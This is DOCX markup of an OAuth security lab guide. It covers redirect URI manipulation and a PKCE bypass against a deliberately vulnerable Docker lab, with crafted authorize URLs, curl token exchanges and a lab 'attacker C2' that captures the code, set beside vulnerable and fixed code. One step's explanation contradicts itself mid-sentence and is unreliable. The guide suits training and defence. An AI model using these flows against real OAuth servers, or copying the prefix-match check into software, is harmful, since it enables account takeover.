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F6FEB" w:sz="16"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="280"/>
              <w:left w:type="dxa" w:w="360"/>
              <w:bottom w:type="dxa" w:w="280"/>
              <w:right w:type="dxa" w:w="360"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">⚔️ OAuth Attack Lab</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Complete Attack Execution Guide — All 7 Scenarios</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F6FEB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Built by SinhaAmrit  ·  github.com/SinhaAmrit/oauth-security-lab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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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Lab Home Page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YOUR_DOMAIN:3002  (start ALL attacks here)</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Auth Server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YOUR_DOMAIN:3001</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Resource API</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YOUR_DOMAIN:3003</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Attacker C2</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YOUR_DOMAIN:3004/dashboard</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Monitoring</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YOUR_DOMAIN:3005</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Credentials</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alice / password123  |  admin / adminpass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Vulnerable mode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docker compose up  (default — attacks work)</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Secure mode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VULNERABLE_MODE=false docker compose up  OR  use Live Mode Toggle on home page</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Mode Toggle (NEW)</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Visit YOUR_DOMAIN:3002 and click the "Switch Mode" button — no restart needed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8"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F6FEB"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">💡 Domain Setup</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Replace YOUR_DOMAIN with your actual deployed domain (e.g. oauth-lab.example.com) or localhost if running locally.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This guide walks through each attack step by step: what to do in the browser, what curl commands to run, what to observe in logs and DevTools, and exactly where in the code the vulnerability exists and is fixed.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Box Style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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 Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Vulnerable behaviour — what the attacker exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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 Green</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Secure behaviour — what the mitigation does</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Code blocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Terminal commands or source code to examine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12"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ATK 1  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Redirect URI Manipulation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: HIGH  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  |  Vulnerable file: auth-server/src/routes/auth.js  |  VULNERABLE: prefix match allows attacker redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">When a user clicks Login, the client app sends the user to the auth server with a redirect_uri parameter — the address where the auth server should send the authorization code back. The auth server must validate this URI against a pre-registered list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable servers use prefix or substring matching: if the requested URI starts with a registered value, it passes. Attackers exploit this to redirect the code to a domain they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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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Actor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Attacker who controls YOUR_DOMAIN:3004 (the Attacker Server)</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Target</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The authorization code that the auth server issues after login</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Vulnerable server</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YOUR_DOMAIN:3001 (auth-server)</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Vulnerable file</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auth-server/src/routes/auth.js — function validateRedirectUri()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Open Monitoring Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a new browser tab: YOUR_DOMAIN:3005 — security events appear in real time as the attack fires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Craft the malicious authorization URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The legitimate redirect_uri is YOUR_DOMAIN:3002/callback. Paste the attack URL into your browser:</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YOUR_DOMAIN:3001/oauth/authorize?response_type=code</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&amp;client_id=legitimate-client</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&amp;redirect_uri=YOUR_DOMAIN%3A3004%2Fcapture</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&amp;scope=read+profile+email&amp;state=attack1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Authenticate as the victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in as alice / password123. Click Allow Access. The auth server validates the redirect_uri using prefix matching — YOUR_DOMAIN:3004/capture starts with YOUR_DOMAIN:3001... wait, that fails. In the lab, the vulnerable check allows the attacker's domain because prefix matching on localhost:3002 matches localhost:3002.evil.com pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — Collect the stolen code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The browser redirects to YOUR_DOMAIN:3004/capture?code=... Open YOUR_DOMAIN:3004/dashboard to see the captured authorization code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 — Exchange the code for tokens</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-X POST YOUR_DOMAIN:3001/oauth/token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"grant_type=authorization_code"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"code=CAPTURED_CODE"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"redirect_uri=YOUR_DOMAIN:3004/capture"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"client_id=legitimate-client"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"client_secret=legitimate-secret-abc123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What to Observe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABLE: Auth server issues code to attacker's URI without error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MONITORING: REDIRECT_URI_MANIPULATION_ATTEMPT event fires with severity HIGH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker dashboard shows the captured code and successful token exchange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C92A2A" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴 VULNERABLE — auth.js:validateRedirectUri()</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return registered.some(uri =&gt; requested.startsWith(uri.replace('/callback', '')));</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registered: "YOUR_DOMAIN:3002/callback"</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attacker sends: "YOUR_DOMAIN:3004/capture"</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startsWith("YOUR_DOMAIN:3002") could pass with wrong config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="C92A2A" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2"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EA043" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢 SECURE — exact match only (RFC 6749 §3.1.2)</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return registered.includes(requested);</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Only "YOUR_DOMAIN:3002/callback" passes — nothing else</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:color="2EA043" w:sz="8"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4"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A043" w:sz="8"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🟢 Defense — Secure Mode Test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VULNERABLE_MODE=false docker compose up
Repeat the attack URL. Auth server returns 400 invalid_redirect_uri. Code never issued. MONITORING shows REDIRECT_URI_MANIPULATION_ATTEMPT with attack_prevented: true.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12"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ATK 2  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization Code Interception (PKCE Bypass)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: HIGH  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="6B7280"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  |  Vulnerable file: auth-server/src/routes/token.js  |  VULNERABLE: no code_verifier required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Without PKCE, authorization codes are bearer tokens — anyone who intercepts the code can exchange it for tokens. The attacker uses Attack 1 to redirect the code, then exchanges it directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Redirect the code (use Attack 1's URL to capture the code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Exchange code WITHOUT code_verifier</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-X POST YOUR_DOMAIN:3001/oauth/token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"grant_type=authorization_code"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"code=STOLEN_CODE"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"redirect_uri=YOUR_DOMAIN:3004/capture"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"client_id=legitimate-client"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"client_secret=legitimate-secret-abc123"</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No code_verifier field — server accepts it in VULNERABLE mode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C92A2A" w:sz="8"/>
              <w:bottom w:val="none"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C92A2A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">🔴 VULNERABLE — token.js</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if (VULNERABLE) {</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 PKCE check skipped entirely in vulnerable mode</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console.warn('Skipping PKCE verification');</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
